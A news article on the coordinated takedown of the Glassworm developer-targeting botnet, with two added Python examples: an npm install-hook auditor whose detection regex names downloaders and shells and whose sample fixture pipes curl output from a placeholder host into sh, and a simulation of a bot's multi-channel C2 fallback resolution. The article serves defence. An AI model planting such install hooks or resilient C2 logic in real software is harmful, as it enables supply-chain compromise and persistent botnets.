CrowdStrike Dismantles Developer-Targeting Glassworm Botnet

Google, the Shadowserver Foundation and CrowdStrike took down a botnet, likely Russian-operated, that targeted developers with a RAT to steal data and poison the software supply chain

In a year where software supply chain attacks dominated the cyber news cycle, the strategic takedown of the Glassworm botnet is welcome news for developers everywhere. 

Through a combined operation with Google and the Shadowserver Foundation, cybersecurity giant CrowdStrike successfully dismantled a sophisticated global botnet designed to withstand traditional takedown efforts. 

The effort, led by CrowdStrike’s Counter Adversary Operations team, targeted an advanced malware infrastructure that used four separate command and control channels so that the botnet remained active even if parts of the network were disabled.

What is the Glassworm botnet? 

From early in 2025, Glassworm operators had been systematically targeting their prey of choice: developers, high-value targets with access to source code repositories, cloud environments, CI/CD pipelines and package registries.

Glassworm's cycle of infection | Credit: CrowdStrike

A shrewd choice of target, because a single compromised developer can snowball into vast supply chain compromises affecting thousands of users and enterprises downstream.

The attackers’ toolkit was multi-pronged.

Trojanised VS Code extensions were published on the Open VSX marketplace under the guise of popular tools such as time trackers and code formatters.

It wasn’t just developers using VS Code who were exposed. Open VSX is the extension registry used by VS Code forks and derivatives including Cursor, Positron, Windsurf and VSCodium, so users of those IDEs could fall victim to the same extensions.

Another weapon was compromised npm and Python packages that introduced malicious code “through postinstall hooks and setup scripts – executing silently during routine dependency installation”.
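Because npm runs `preinstall`, `install`, `postinstall` and `prepare` scripts automatically, an install-time hook is the natural place for a trojanised package to execute. The following audit script is an added example (not CrowdStrike’s code and not derived from any Glassworm sample) that scans package.json manifests for such hooks and flags those that invoke downloaders, shells, decoders or inline script evaluation. The three sample manifests, package names and the `example.invalid` URL are constructed for illustration.

```python
"""Audit npm manifests for install-time lifecycle hooks (added example)."""
import json
import os
import re
from typing import Dict, List

# Scripts npm executes with no user interaction during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments that commonly appear in malicious install hooks:
# downloaders, shells, decoders and inline code execution.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|pwsh|sh\s+-c|bash\s+-c|base64|eval|"
    r"child_process|node\s+-e|python\s+-c)\b",
    re.IGNORECASE,
)


def audit_manifest(manifest: str, name: str = "<inline>") -> List[Dict[str, str]]:
    """Return one finding per install-time hook found in a package.json string.

    Risk is 'high' when the command matches SUSPICIOUS, otherwise 'review':
    every install hook deserves a look, but many are legitimate (for
    example native add-ons that run node-gyp at install time).
    """
    data = json.loads(manifest)
    scripts = data.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        risk = "high" if SUSPICIOUS.search(cmd) else "review"
        findings.append({"package": data.get("name", name), "hook": hook,
                         "command": cmd, "risk": risk})
    return findings


def audit_node_modules(root: str) -> List[Dict[str, str]]:
    """Walk a node_modules tree and audit every package.json in it."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        with open(path, encoding="utf-8") as fh:
            try:
                findings.extend(audit_manifest(fh.read(), name=path))
            except json.JSONDecodeError:
                continue  # malformed manifest; out of scope for this check
    return findings


# Constructed sample manifests; these are not real packages.
BENIGN = json.dumps({"name": "left-pad-ish", "version": "1.0.0",
                     "scripts": {"test": "jest"}})
NATIVE_BUILD = json.dumps({"name": "some-native-addon", "version": "2.1.0",
                           "scripts": {"install": "node-gyp rebuild"}})
MALICIOUS = json.dumps({"name": "time-tracker-helper", "version": "0.0.3",
                        "scripts": {"postinstall":
                                    "curl -s http://example.invalid/s | sh"}})

if __name__ == "__main__":
    for manifest in (BENIGN, NATIVE_BUILD, MALICIOUS):
        for f in audit_manifest(manifest):
            print(f"{f['risk']:6} {f['package']}: {f['hook']} -> {f['command']}")
```

Run `audit_node_modules("node_modules")` after a clean install to review what would have executed. The blunt but effective mitigation in CI is to install with `npm ci --ignore-scripts` (and `pip install --only-binary=:all:` on the Python side, which refuses to run setup.py from source distributions), then run any genuinely needed build steps explicitly.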


Poisoned GitHub repositories rounded out the campaign: credentials harvested from earlier Glassworm infections were used to force-push malicious commits into more than 300 repositories.

A full-blown Node.js remote access tool, GlasswormRAT, was also uncovered. The operation was cross-platform, with Windows, macOS and Linux all affected.

CrowdStrike has reason to believe that the criminals behind this operation are likely based in Russia. 

Persistent malware infrastructure

Built for resilience, the infrastructure leaned on decentralised technologies that have no single operator to serve a takedown request, making the malware operation far harder to dismantle.

The botnet had been engineered for persistence, relying on multiple communication methods that allowed infected devices to continue receiving instructions even if one system failed.

The botnet’s C2 server addresses were encoded in the memo fields of Solana transactions, thereby creating “an immutable, publicly accessible dead-drop that cannot be taken offline through conventional means,” as CrowdStrike puts it. An infected machine only needs to read public blockchain data to recover its tasking, so the dead-drop survives for as long as the chain itself does.

Glassworm C2 infrastructure and disruption | Credit: CrowdStrike

The BitTorrent network was also leveraged: GlasswormRAT queried the BitTorrent Distributed Hash Table (DHT), the peer-to-peer lookup service BitTorrent clients use to find each other without a central tracker, for records published under hardcoded public keys.

The botnet also relied on Google Calendar events and commercial virtual servers to distribute instructions and payloads to infected machines. 

CrowdStrike calls this “a dynamic front protecting the actual C2 servers behind multiple layers of indirection”.
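To make the fallback behaviour concrete, here is an added example, not GlasswormRAT code and not derived from any sample, that models a bot consulting four independent dead-drop channels in turn and accepting the newest decodable record from the first channel that answers. The record encoding (base64 of `host:port`), channel names, channel contents and the TEST-NET addresses are all constructed for illustration; the point it demonstrates is that tasking continues while any one channel is alive, which is why a takedown has to hit all of them at once.

```python
"""Multi-channel C2 resolution with fallback (added example)."""
import base64
import re
from typing import Callable, Dict, List, Optional, Tuple

# Order in which the simulated bot consults its channels.
CHANNEL_ORDER = ["solana_memo", "bittorrent_dht", "google_calendar", "vps"]

_ADDR_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}:\d{1,5}$")


def decode_record(record: str) -> Optional[str]:
    """Return 'host:port' if RECORD is a valid dead-drop entry, else None.

    Public channels carry unrelated data, so anything that is not valid
    base64, not ASCII, or not of the form host:port is silently skipped.
    """
    try:
        text = base64.b64decode(record, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if _ADDR_RE.match(text) else None


def newest_address(records: List[str]) -> Optional[str]:
    """Records are oldest-first; the newest decodable one is authoritative."""
    for record in reversed(records):
        addr = decode_record(record)
        if addr is not None:
            return addr
    return None


def resolve_c2(channels: Dict[str, Callable[[], List[str]]],
               order: List[str] = CHANNEL_ORDER) -> Optional[Tuple[str, str]]:
    """Try channels in ORDER; return (channel, address) from the first that works.

    A channel that raises ConnectionError (taken offline) or holds no valid
    record is skipped. None is returned only when every channel fails,
    which is the condition a coordinated takedown must achieve.
    """
    for name in order:
        try:
            records = channels[name]()
        except ConnectionError:
            continue
        addr = newest_address(records)
        if addr is not None:
            return name, addr
    return None


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("ascii")).decode("ascii")


# Constructed channel contents using TEST-NET addresses; nothing here is real.
LIVE_CHANNELS: Dict[str, Callable[[], List[str]]] = {
    # An older address superseded by a newer one, plus unrelated memo noise.
    "solana_memo": lambda: [_b64("192.0.2.5:443"), "gm frens", _b64("203.0.113.10:443")],
    "bittorrent_dht": lambda: [_b64("203.0.113.11:443")],
    "google_calendar": lambda: ["Team sync", _b64("203.0.113.12:8443")],
    "vps": lambda: [_b64("198.51.100.7:8443")],
}


def _down() -> List[str]:
    raise ConnectionError("channel disrupted")


def simulate_takedown(disabled: List[str]) -> Optional[Tuple[str, str]]:
    """Resolve C2 with the named channels taken offline."""
    channels = {name: (_down if name in disabled else source)
                for name, source in LIVE_CHANNELS.items()}
    return resolve_c2(channels)


if __name__ == "__main__":
    print("all channels up   :", simulate_takedown([]))
    print("three of four down:", simulate_takedown(CHANNEL_ORDER[:3]))
    print("all four down     :", simulate_takedown(CHANNEL_ORDER))
```

Disabling three of the four channels still yields a working C2 address from the fourth; only disabling all four leaves the bot with nothing. The same structure explains why a defender who gains control of a channel (for example by being able to publish a newer record than the operators) can redirect bots rather than merely silence them.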

The Takedown

CrowdStrike notes that disrupting a botnet of this sophisticated architecture “required precision and timing”.

“Taking down only one channel would have left the others operational, allowing the operators to quickly reconstitute. All four channels had to be disrupted simultaneously in a coordinated effort,” CrowdStrike says. 

Alessandro Guggino, Senior Security Researcher at CrowdStrike, adds: “CrowdStrike played offense and brought the fight to the adversary.


“The Counter Adversary Operations team disrupted a global botnet built for resilience, engineered with four distinct command and control (C2) channels to be nearly impossible to take down.

“The C2 architecture relied on two decentralised networks that were taken over and eclipsed - the Solana blockchain and the BitTorrent distributed hash table (DHT) – as well as Google Calendar events and commercial virtual servers, taken down by our operation partners.

“As a result, infected machines can no longer receive new instructions or payloads.”

For enterprises, the incident serves as another reminder that modern cybersecurity requires proactive threat hunting, collaborative intelligence sharing and tactical disruption.  

Traditional security efforts that focus only on detection may struggle against adversaries using decentralised infrastructure and layered command systems.

CrowdStrike’s latest operation shows offensive measures becoming a more visible part of the industry’s strategy, as defenders increasingly work together to dismantle the infrastructure that powers organised cybercrime.
